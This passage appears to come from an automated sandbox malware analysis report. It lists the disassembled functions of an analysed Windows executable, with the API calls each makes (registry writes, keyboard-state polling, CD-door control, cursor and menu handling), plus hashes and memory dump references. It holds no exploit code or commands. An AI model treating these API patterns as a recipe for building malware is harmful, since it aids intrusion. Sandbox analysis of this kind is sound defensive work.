                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                    • String ID: .dll$.exe$.icl$Qe
                                                                                                    • API String ID: 799131459-2048720608
                                                                                                    • Opcode ID: 6c600a2a22b327e67a13f4fe0077969f5b53505c2654c91aef5748bcb308e845
                                                                                                    • Instruction ID: d477384e749fb02c347b4218c1123be05615728b2642f0b9d985d04b73a1fef9
                                                                                                    • Opcode Fuzzy Hash: 6c600a2a22b327e67a13f4fe0077969f5b53505c2654c91aef5748bcb308e845
                                                                                                    • Instruction Fuzzy Hash: FB61DF71510316FEEB14DF64DC85BBF77A8BB18710F108606F955D60D2DBB49AA0CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001FCD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FCE1C
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0020DCD0,00000000,?,00000000,?,?), ref: 001FCEA3
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001FCF03
                                                                                                    • _wcslen.LIBCMT ref: 001FCF53
                                                                                                    • _wcslen.LIBCMT ref: 001FCFCE
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001FD011
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001FD120
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001FD1AC
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001FD1E0
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001FD1ED
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001FD2BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                    • API String ID: 9721498-966354055
                                                                                                    • Opcode ID: 2d71b2f69b68cf99b8718111f29ea7ea65729648ae9bff546dbd5d7c0a3f402d
                                                                                                    • Instruction ID: 30d986826d8a7dad72a022c5a5c2b273c8c17383e68312b384e2cf887851e700
                                                                                                    • Opcode Fuzzy Hash: 2d71b2f69b68cf99b8718111f29ea7ea65729648ae9bff546dbd5d7c0a3f402d
                                                                                                    • Instruction Fuzzy Hash: B81247752042059FDB14EF14C885A2ABBF6FF98714F14849CF99A9B3A2CB31ED41CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E47D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 001E4852
                                                                                                    • _wcslen.LIBCMT ref: 001E485D
                                                                                                    • _wcslen.LIBCMT ref: 001E48B4
                                                                                                    • _wcslen.LIBCMT ref: 001E48F2
                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 001E4930
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E4978
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E49B3
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001E49E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                    • Opcode ID: 38dbd3cb6dc2e07756af151f24133f7f47b7242953e609bd3a10e766922e6ca7
                                                                                                    • Instruction ID: a97d43dfd42cf01ee5114c8567bfcbf9c8d6861cae6e3ca7bff6d35d669e0840
                                                                                                    • Opcode Fuzzy Hash: 38dbd3cb6dc2e07756af151f24133f7f47b7242953e609bd3a10e766922e6ca7
                                                                                                    • Instruction Fuzzy Hash: A471D2715086529FC710EF65C88096EB7F4FFA8768F10892DF896972A2EB30DD45CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D62AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000063), ref: 001D62BD
                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001D62CF
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 001D62E6
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001D62FB
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001D6301
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001D6311
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001D6317
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001D6338
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001D6352
                                                                                                    • GetWindowRect.USER32(?,?), ref: 001D635B
                                                                                                    • _wcslen.LIBCMT ref: 001D63C2
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 001D63FE
                                                                                                    • GetDesktopWindow.USER32 ref: 001D6404
                                                                                                    • GetWindowRect.USER32(00000000), ref: 001D640B
                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001D6462
                                                                                                    • GetClientRect.USER32(?,?), ref: 001D646F
                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 001D6494
                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001D64BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 895679908-0
                                                                                                    • Opcode ID: dc34c8a13648d373a3c53f7297ec3d9dae5bb6cb42b35a6686dc0e1d08d7c165
                                                                                                    • Instruction ID: a85a6256c84026a90bea3c98e878aa57b61b28bbab0d0ea63b9967f345e7fa59
                                                                                                    • Opcode Fuzzy Hash: dc34c8a13648d373a3c53f7297ec3d9dae5bb6cb42b35a6686dc0e1d08d7c165
                                                                                                    • Instruction Fuzzy Hash: 8C718D31900705EFDB20DFA8DE49BAEBBF9FF48704F10091AE586A26A0D775E944CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 001F0784
                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 001F078F
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001F079A
                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 001F07A5
                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 001F07B0
                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 001F07BB
                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 001F07C6
                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 001F07D1
                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 001F07DC
                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 001F07E7
                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 001F07F2
                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 001F07FD
                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 001F0808
                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 001F0813
                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 001F081E
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 001F0829
                                                                                                    • GetCursorInfo.USER32(?), ref: 001F0839
                                                                                                    • GetLastError.KERNEL32 ref: 001F087B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215588206-0
                                                                                                    • Opcode ID: 4e94249556425a7b597972cf92ee3817aaabb991020aab17bf9e083bb1373ccc
                                                                                                    • Instruction ID: 1f9a255f6909bebc582549fcde590bccabf3270d022cba8c1a028ff48718c3d6
                                                                                                    • Opcode Fuzzy Hash: 4e94249556425a7b597972cf92ee3817aaabb991020aab17bf9e083bb1373ccc
                                                                                                    • Instruction Fuzzy Hash: 4B4146B0D043196ADB10DFB68C8986EBFE8FF08754B50452AE11DE7291DB74D901CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00190456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00190456
                                                                                                      • Part of subcall function 0019047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0024170C,00000FA0,405F30D1,?,?,?,?,001B2753,000000FF), ref: 001904AC
                                                                                                      • Part of subcall function 0019047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001B2753,000000FF), ref: 001904B7
                                                                                                      • Part of subcall function 0019047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001B2753,000000FF), ref: 001904C8
                                                                                                      • Part of subcall function 0019047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001904DE
                                                                                                      • Part of subcall function 0019047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001904EC
                                                                                                      • Part of subcall function 0019047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001904FA
                                                                                                      • Part of subcall function 0019047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00190525
                                                                                                      • Part of subcall function 0019047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00190530
                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00190477
                                                                                                      • Part of subcall function 00190433: __onexit.LIBCMT ref: 00190439
                                                                                                    Strings
                                                                                                    • SleepConditionVariableCS, xrefs: 001904E4
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001904B2
                                                                                                    • kernel32.dll, xrefs: 001904C3
                                                                                                    • InitializeConditionVariable, xrefs: 001904D8
                                                                                                    • WakeAllConditionVariable, xrefs: 001904F2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 66158676-1714406822
                                                                                                    • Opcode ID: 381e656e23903683eaab76d0db65271fa9d571e5676fccd52ff38ee9d3bc24d8
                                                                                                    • Instruction ID: e28bc3b57203926b6c00943d5c783c26946e854f61e165e7d479b03f72604c84
                                                                                                    • Opcode Fuzzy Hash: 381e656e23903683eaab76d0db65271fa9d571e5676fccd52ff38ee9d3bc24d8
                                                                                                    • Instruction Fuzzy Hash: 91210B36A45310AFEF166BF8BC4DB69B7E4DB1DB61F014125F905D7290DFB09C808A50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F4946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0020DCD0), ref: 001F4A18
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001F4A2A
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0020DCD0), ref: 001F4A4F
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,0020DCD0), ref: 001F4A9B
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,0020DCD0), ref: 001F4B05
                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 001F4BBF
                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001F4C25
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 001F4C4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                    • API String ID: 354098117-199464113
                                                                                                    • Opcode ID: bfa60e6c7eeef76298e440a3e835a8c6e8f6fe65456afd61ef2f8d0feee3850f
                                                                                                    • Instruction ID: 81099fc2e3f0d677883a938d6e35a27b32ca128f6f6f634f94c754471e42d8da
                                                                                                    • Opcode Fuzzy Hash: bfa60e6c7eeef76298e440a3e835a8c6e8f6fe65456afd61ef2f8d0feee3850f
                                                                                                    • Instruction Fuzzy Hash: B2123F75A00109EFDB14CF94C884EBEBBB5FF45314F158098EA19AB252D735ED46CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DC80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00242990,000000FF,00000000,00000030), ref: 001DC888
                                                                                                    • SetMenuItemInfoW.USER32(00242990,00000004,00000000,00000030), ref: 001DC8BD
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 001DC8CF
                                                                                                    • GetMenuItemCount.USER32(?), ref: 001DC915
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 001DC932
                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 001DC95E
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 001DC9A5
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001DC9EB
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001DCA00
                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001DCA21
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                    • Opcode ID: e882c7b4d179f155f50c43e9d65e31e8980012d87424518bc660d22a881cd341
                                                                                                    • Instruction ID: a9acafa21ac92c9366b5cf6ec5f053197e17247e05920d467cfca076155c5097
                                                                                                    • Opcode Fuzzy Hash: e882c7b4d179f155f50c43e9d65e31e8980012d87424518bc660d22a881cd341
                                                                                                    • Instruction Fuzzy Hash: FF61607090125BABDF15CFA8DC98AEEBFB9FB05308F500956F841A3291D774AD45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001DE3E9
                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001DE40F
                                                                                                    • _wcslen.LIBCMT ref: 001DE419
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001DE469
                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001DE485
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                    • Opcode ID: 27b6382b2c0db88afb445b466e6deed238e45eb4995a6a32ed575eedeb62425e
                                                                                                    • Instruction ID: 828aecd6a4fc6f91789ec5535baf2fca0ade111500d412d50a950cf486aa5ace
                                                                                                    • Opcode Fuzzy Hash: 27b6382b2c0db88afb445b466e6deed238e45eb4995a6a32ed575eedeb62425e
                                                                                                    • Instruction Fuzzy Hash: 5B41E6729403047BEF15BBA49C47EBF77ACEF66710F10006AF900A61C2FB74DA1196A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E4678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001E469A
                                                                                                    • _wcslen.LIBCMT ref: 001E46C7
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 001E46F7
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001E4718
                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 001E4728
                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001E47AF
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001E47BA
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001E47C5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                    • String ID: :$\$\??\%s
                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                    • Opcode ID: 49a2a323a75831d6be16c5020c2de57d84d0264e0f65719a7783f5ac692f319e
                                                                                                    • Instruction ID: 1173fbcf9631e4a90a0983d87b36ce129caf5b5cf8ad73721f75aa5921e8fd52
                                                                                                    • Opcode Fuzzy Hash: 49a2a323a75831d6be16c5020c2de57d84d0264e0f65719a7783f5ac692f319e
                                                                                                    • Instruction Fuzzy Hash: AE31C2B5904249ABDB209FA1DC49FEF37BCEF89740F1041B9FA09D6061EB7096848B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DA86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 001DA8EE
                                                                                                    • SetKeyboardState.USER32(?), ref: 001DA959
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001DA979
                                                                                                    • GetKeyState.USER32(000000A0), ref: 001DA990
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001DA9BF
                                                                                                    • GetKeyState.USER32(000000A1), ref: 001DA9D0
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001DA9FC
                                                                                                    • GetKeyState.USER32(00000011), ref: 001DAA0A
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001DAA33
                                                                                                    • GetKeyState.USER32(00000012), ref: 001DAA41
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001DAA6A
                                                                                                    • GetKeyState.USER32(0000005B), ref: 001DAA78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: 67da9145aec5bcd27853b0eaa8388ce6f703c0cf2961f3e60b64993635685ac0
                                                                                                    • Instruction ID: 0c45f8154e7fec53386d982f241d80142ff506b8b205e284904e9523e49ba31a
                                                                                                    • Opcode Fuzzy Hash: 67da9145aec5bcd27853b0eaa8388ce6f703c0cf2961f3e60b64993635685ac0
                                                                                                    • Instruction Fuzzy Hash: 1551D62090878869EB35E7B089547AABFB49F11340F88459BD9C25B3C2DB549A4CCBA3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D6555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
